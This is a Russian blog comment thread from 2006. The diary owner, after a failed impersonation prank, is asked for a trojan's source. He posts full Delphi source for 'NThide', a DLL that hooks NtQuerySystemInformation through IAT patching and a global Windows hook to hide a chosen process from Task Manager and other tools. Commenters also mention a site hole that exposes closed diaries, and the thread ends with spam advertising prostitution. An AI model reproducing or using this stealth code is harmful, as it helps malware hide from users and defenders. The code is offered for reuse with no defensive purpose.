-Подписка по e-mail

 

 -Поиск по дневнику

Поиск сообщений в WEC1

 -Сообщества

Читатель сообществ (Всего в списке: 1) o_0

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 10.05.2005
Записей:
Комментариев:
Написано: 754


Полное Фиаско !

+ в цитатник

Cообщение скрыто для удобства комментирования.
Прочитать сообщение


Кивашка   обратиться по имени Четверг, 12 Января 2006 г. 12:49 (ссылка)
Ха) Леди электричество не так то просто облапошить))) Дашь исходник троя? На досуге поизучаю)
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Полное Фиаско ! Четверг, 12 Января 2006 г. 21:08 (ссылка)
вот так-то... нужно знакомиЦЦа с личными зар-ками людей!!)))
В колонках играет: Король и Шут - Мотоцикл

LI 5.09.15
Ответить С цитатой В цитатник
Кивашка   обратиться по имени Четверг, 12 Января 2006 г. 21:27 (ссылка)
Передавай там приветы девчонкам)) А то я их не вижу че то(
Ответить С цитатой В цитатник
WEC1   обратиться по имени Пятница, 13 Января 2006 г. 01:54 (ссылка)
Исходное сообщение Chgou
вот так-то... нужно знакомиЦЦа с личными зар-ками людей!!)))

с какими "зар-ками" ? Что это значит ? )) Непонял ))

Кивашка,
С Делфи знаком ? Трой как трой, я лучше тебе другое покажу, может ты не видел ещё такое ;) :

library NThide;

uses
Windows,
SysUtils,
ImageHlp,
TlHelp32;

type

SYSTEM_INFORMATION_CLASS = (
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
);


_IMAGE_IMPORT_DESCRIPTOR = packed record
case Integer of 0: (
Characteristics: DWORD);
1: (
OriginalFirstThunk: DWORD;
TimeDateStamp: DWORD;
ForwarderChain: DWORD;
Name: DWORD;
FirstThunk: DWORD);
end;
IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;
PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;

PFARPROC=^FARPROC;



(*Нижеследующая процедура взята из Рихтера и переделана на Delphi*)
procedure ReplaceIATEntryInOneMod(pszCallerModName:Pchar;pfnCurrent:FarProc;pfnNew:FARPROC;hmodCaller:hModule);
var ulSize:ULONG; pImportDesc:PIMAGE_IMPORT_DESCRIPTOR;pszModName:PChar;
pThunk:PDWORD; ppfn:PFARPROC;ffound:LongBool;written: DWORD;
begin
pImportDesc := ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);
if pImportDesc = nil then exit;
while pImportDesc.Name<>0 do
begin
pszModName := PChar(hmodCaller + pImportDesc.Name);
if (lstrcmpiA(pszModName, pszCallerModName) = 0) then break;
Inc(pImportDesc);
end;
if (pImportDesc.Name = 0) then exit;
pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);
while pThunk^<>0 do
begin
ppfn := PFARPROC(pThunk);
fFound := (ppfn^ = pfnCurrent);
if (fFound) then
begin
VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);
WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);
exit;
end;
Inc(pThunk);
end;
end;



var
addr_NtQuerySystemInformation:Pointer;
mypid: DWORD;
fname:PCHAR;
mapaddr:PDWORD;
hideOnlyTaskMan:PBOOL;


(*А это взято из материалов сайта Wasm.ru*)
function myNtQuerySystemInfo(SystemInformationClass:SYSTEM_INFORMATION_CLASS;SystemInformation:Pointer;
SystemInformationLength:ULONG;ReturnLength:PULONG):LongInt;stdcall;
label onceagain,getnextpidstruct,quit,fillzero;
asm
push ReturnLength
push SystemInformationLength
push SystemInformation
push dword ptr SystemInformationClass
call dword ptr [addr_NtQuerySystemInformation]
or eax,eax
jl quit
cmp SystemInformationClass,SystemProcessesAndThreadsInformation
jne quit
onceagain:
mov esi,SystemInformation
getnextpidstruct:
mov ebx,esi
cmp dword ptr [esi],0
je quit
add esi,[esi]
mov ecx,[esi+44h]
cmp ecx,mypid
jne getnextpidstruct
mov edx,[esi]
test edx,edx
je fillzero
add [ebx],edx
jmp onceagain
fillzero:
and [ebx],edx
jmp onceagain
quit:
mov Result,eax
end;


procedure InterceptFunctions;
var hSnapShot:THandle;me32:MODULEENTRY32;
begin
addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
if hSnapshot=INVALID_HANDLE_VALUE then exit;
try
ZeroMemory(@me32,sizeof(MODULEENTRY32));
me32.dwSize:=sizeof(MODULEENTRY32);
Module32First(hSnapShot,me32);
repeat
ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);
until not Module32Next(hSnapShot,me32);
finally
CloseHandle(hSnapShot);
end;
end;

procedure UninterceptFunctions;
var hSnapShot:THandle;me32:MODULEENTRY32;
begin
addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
if hSnapshot=INVALID_HANDLE_VALUE then exit;
try
ZeroMemory(@me32,sizeof(MODULEENTRY32));
me32.dwSize:=sizeof(MODULEENTRY32);
Module32First(hSnapShot,me32);
repeat
ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);
until not Module32Next(hSnapShot,me32);
finally
CloseHandle(hSnapShot);
end;
end;


var HookHandle: THandle;

function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;
begin
Result:=0;
end;

procedure InstallHook; stdcall;
begin
HookHandle:=SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);
end;

var hFirstMapHandle:THandle;

function HideProcess(pid: DWORD;
HideOnlyFromTaskManager:BOOL(*Прятать только от TaskManager или еще и от других прог?*)):BOOL;stdcall;
var addrMap:PDWORD;ptr2:PBOOL;
begin
mypid:=0;
result:=false;
hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');
if hFirstMapHandle=0 then exit;
addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);
if addrMap=nil then
begin
CloseHandle(hFirstMapHandle);
exit;
end;
addrMap^:=pid;
ptr2:=PBOOL(DWORD(addrMap)+4);
ptr2^:=HideOnlyFromTaskManager;
UnmapViewOfFile(addrMap);//унмапим, но хендл для Mapping'а не закрываем, чтобы он не уничтожился
InstallHook; //хук
result:=true;
end;

exports
HideProcess;

var
hmap:THandle;


procedure LibraryProc(Reason: Integer);
begin
if Reason=DLL_PROCESS_DETACH then
if mypid>0 then
UninterceptFunctions()
else
CloseHandle(hFirstMapHandle);
end;


begin
hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');
if hmap=0 then exit;
try
mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);
if mapaddr=nil then exit;
mypid:=mapaddr^;
hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);
if hideOnlyTaskMan^ then
begin
fname:=allocMem(MAX_PATH+1);
GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);
if not (ExtractFileName(fname)='taskmgr.exe') then exit;
end;
InterceptFunctions;
finally
UnmapViewOfFile(mapaddr);
CloseHandle(Hmap);
DLLProc:=@LibraryProc;
end;
end.

Ответить С цитатой В цитатник
WEC1   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 02:08 (ссылка)
Исходное сообщение Кивашка: Передавай там приветы девчонкам)) А то я их не вижу че то(

Так они тут бывают вроде иногда, тут и передай сам ;)

LI 5.09.15
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 03:12 (ссылка)
Исходное сообщение WEC1: [QUOTE]Исходное сообщение Chgou
с какими "зар-ками" ? Что это значит ? )) Непонял ))


пардон... хотела сократить слово и не ту букАвку поставила...
ну, с личными тарканами человека, которого собираешься "копировать"!!))
В колонках играет: Сценакардия - Делу время (Кардебалет)

LI 5.09.15
Ответить С цитатой В цитатник
WEC1   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 03:19 (ссылка)
Исходное сообщение Chgou:
пардон... хотела сократить слово и не ту букАвку поставила...
ну, с личными тарканами человека, которого собираешься "копировать"!!))

Так-с )) Начнём )) Chgou, расскажите пожалуйста о Ваших тараканах :D Мне это нужно для одного дельца ;)

LI 5.09.15
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 03:37 (ссылка)
Исходное сообщение WEC1:
Так-с )) Начнём )) Chgou, расскажите пожалуйста о Ваших тараканах :D Мне это нужно для одного дельца ;)


для Вас - кЫсь!!))

ну, у меня их всего три!! Рыжий, длинный и Серый!!)) Рыжий - русский!! длинный - американский, а Серый - на самом деле француз... и зовут его Сержо!! такой вот интернационал!!)))
ещё мышка есть!! Точней не мышь, а что-то типа гибрида вышеупомянутой и и хомяка... "Тапо" зовут!!))))))
В колонках играет: Дима Билан - Одинокая Гармонь

LI 5.09.15
Ответить С цитатой В цитатник
WEC1   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 04:24 (ссылка)
Исходное сообщение Chgou:
ну, у меня их всего три!! Рыжий, длинный и Серый!!)) Рыжий - русский!! длинный - американский, а Серый - на самом деле француз... и зовут его Сержо!! такой вот интернационал!!)))
ещё мышка есть!! Точней не мышь, а что-то типа гибрида вышеупомянутой и и хомяка... "Тапо" зовут!!))))))

Прям зоопарк какой-то :D Надеюсь, Вы их кормите ? )))

LI 5.09.15
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 05:23 (ссылка)
Исходное сообщение WEC1:
Прям зоопарк какой-то :D Надеюсь, Вы их кормите ? )))


ytnнет!! муж поесть оставляет!!)) Он и меня кормит!!)))
В колонках играет: Daje esli ti uydesh SERGEY LAZAREV

LI 5.09.15
Ответить С цитатой В цитатник
glu   обратиться по имени Пятница, 13 Января 2006 г. 05:23 (ссылка)
*P.P.P.S. Глю, могла бы с подругой(тоесть со мной :D ) то поговорить, ты бы как моим подтверждением стала )) Или ты тоже заподозрила ? ) И вообще что происходило, когда я пришёл под чужим именем ? ) Расскажите, интересно же ) Мне нужно узнать как вы подозревали, почему, и если подозревали, как хотели меня проверять? Мне это нужно для статьи, так что выкладывайте плиз )*

Ну ващет я тогда не была за компом а общаться теле портически я еще не научилась))...
Пусть тебе Ната сама расскажет)))

Chgou,
кЫся жжжошь

Кивашка,
Привет))
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 05:44 (ссылка)
Исходное сообщение glu: [B
Chgou,
кЫся жжжошь
[/B]


угу!!)))
В колонках играет: Daje esli ti uydesh SERGEY LAZAREV

LI 5.09.15
Ответить С цитатой В цитатник
Pas111   обратиться по имени Пятница, 13 Января 2006 г. 06:23 (ссылка)
Вес, твоим главным проколом было то что ты не предупредил меня :) Ведь ты же не мог предположить что Лисса во время разговора с тобой общалась и со мной тоже, и я не знал что ты пытаешься сделать. Лисса сказала что либо эта девушка совсем тупаю (или что-то типа этого) либо над ней стебуться :) И тут я сказал что это мог быть ты, так что извини, но ты прокололся на мне :)
Ответить С цитатой В цитатник
glu   обратиться по имени Пятница, 13 Января 2006 г. 06:42 (ссылка)
Chgou,
*засосало*

Pas111,
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 07:50 (ссылка)
Исходное сообщение glu: Chgou,
*засосало*


а тя на смайлы сёня прёт!!))) засосало меня!?!? куда!?!?!
В колонках играет: Christina Aguilera - Fighter (Album Version)

LI 5.09.15
Ответить С цитатой В цитатник
glu   обратиться по имени Пятница, 13 Января 2006 г. 07:54 (ссылка)
Chgou,
Ага ..прикольные смайлики :D
Ну куда я тя могу засосать?) Ну как обычна
Ответить С цитатой В цитатник
WEC1   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 07:56 (ссылка)
Исходное сообщение Chgou:
а тя на смайлы сёня прёт!!))) засосало меня!?!? куда!?!?!

Не то слово !!! ))) Весь МСН уже заспамила смайлами )))00 такая зайчон

LI 5.09.15
Ответить С цитатой В цитатник
Кивашка   обратиться по имени Пятница, 13 Января 2006 г. 08:46 (ссылка)
WEC1, Мда...))) Без бутылки не разобраться)))
Оригинально, весьма)) понял процентов на 80 чего там творится)))
glu, Нашел дыру в на лиру))) Почитал твой дневик 8-) даже в пч заделался ;) Как дела?
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 08:49 (ссылка)
Исходное сообщение glu: Chgou,
Ага ..прикольные смайлики :D
Ну куда я тя могу засосать?) Ну как обычна


Вай-вай... засасывай поскорей!!
В колонках играет: Lindsay Lohan - Nobody 'Til You

LI 5.09.15
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 08:49 (ссылка)
Исходное сообщение WEC1:
Не то слово !!! ))) Весь МСН уже заспамила смайлами )))00 такая зайчон


это не зайчон, а покемон!!
В колонках играет: Lindsay Lohan - Nobody 'Til You

LI 5.09.15
Ответить С цитатой В цитатник
glu   обратиться по имени Пятница, 13 Января 2006 г. 08:54 (ссылка)
Кивашка,
Что-нибудь интересное вычитал?
В пч можно заделаться даже в закрытом не заходя в него *пожимая плечами*
=)

Chgou,
*уже засосало уже высасываю вместе с ребрами))))*
Ответить С цитатой В цитатник
Chgou   обратиться по имени Re: Ответ в WEC1; Полное Фиаско ! Пятница, 13 Января 2006 г. 09:02 (ссылка)
Исходное сообщение glu:
Chgou,
*уже засосало уже высасываю вместе с ребрами))))*


а не надо меня высасывать!!))
В колонках играет: Plazma - An Ordinaly Miracle!!

LI 5.09.15
Ответить С цитатой В цитатник
Кивашка   обратиться по имени Пятница, 13 Января 2006 г. 10:10 (ссылка)
glu, А вот и не угадала))) Дыра даже никак с этим не связана))) Интересного пока ничего...Я еще до конца не дочитал)))
Ответить С цитатой В цитатник
glu   обратиться по имени Пятница, 13 Января 2006 г. 10:24 (ссылка)
Кивашка,
А кто говорил, что дыра с этим связана? А то, что на ли.ру можно читать закрытые дневники без доступа. Ты меня не удивил. =]
Ответить С цитатой В цитатник
WEC1   обратиться по имени Суббота, 14 Января 2006 г. 02:24 (ссылка)
Кивашка,
ооо, про дырочку поподробней плиз ;)
Ответить С цитатой В цитатник
Аноним   обратиться по имени Суббота, 21 Января 2006 г. 03:56 (ссылка)
это.. Здрасти Вам)
Вообщем на счет "поверила в конце". На самом деле в конце я окончательно убедилась что это ты) Думаешь я зря тебе говорила "Спроси у Веса. он мальчик умный, обязательно что-нибудь придумает" =)
Ответить С цитатой В цитатник
WEC1   обратиться по имени Среда, 25 Января 2006 г. 02:14 (ссылка)
Исходное сообщение Леди_Элекричество
это.. Здрасти Вам)
Вообщем на счет "поверила в конце". На самом деле в конце я окончательно убедилась что это ты) Думаешь я зря тебе говорила "Спроси у Веса. он мальчик умный, обязательно что-нибудь придумает" =)

Ну и ладно
Ответить С цитатой В цитатник
Аноним   обратиться по имени Суббота, 06 Сентября 2008 г. 15:51 (ссылка)
Hi.
Отличный дневник у тебя!
Решила поделиться статьей
Оказывается у нас в России более 80% мужчин пользуются услугами девочек
Больше всего востребованы Путаны Москвы И больших городов Почему?
Наверное всего из-за разнообразного секса,
который бляди умеют приподносить. Да и вправду в крупных городах все всегда есть, да и секс найти проще. Не правда ли?
Ответить С цитатой В цитатник
Аноним   обратиться по имени Вторник, 10 Февраля 2009 г. 09:24 (ссылка)
Здравствуйте
Добро пожаловать в закрытый клуб интеллектуалов!


Ответить С цитатой В цитатник
Комментировать К дневнику Страницы: [1] [Новые]
 

Добавить комментарий:
Текст комментария: смайлики

Проверка орфографии: (найти ошибки)

Прикрепить картинку:

 Переводить URL в ссылку
 Подписаться на комментарии
 Подписать картинку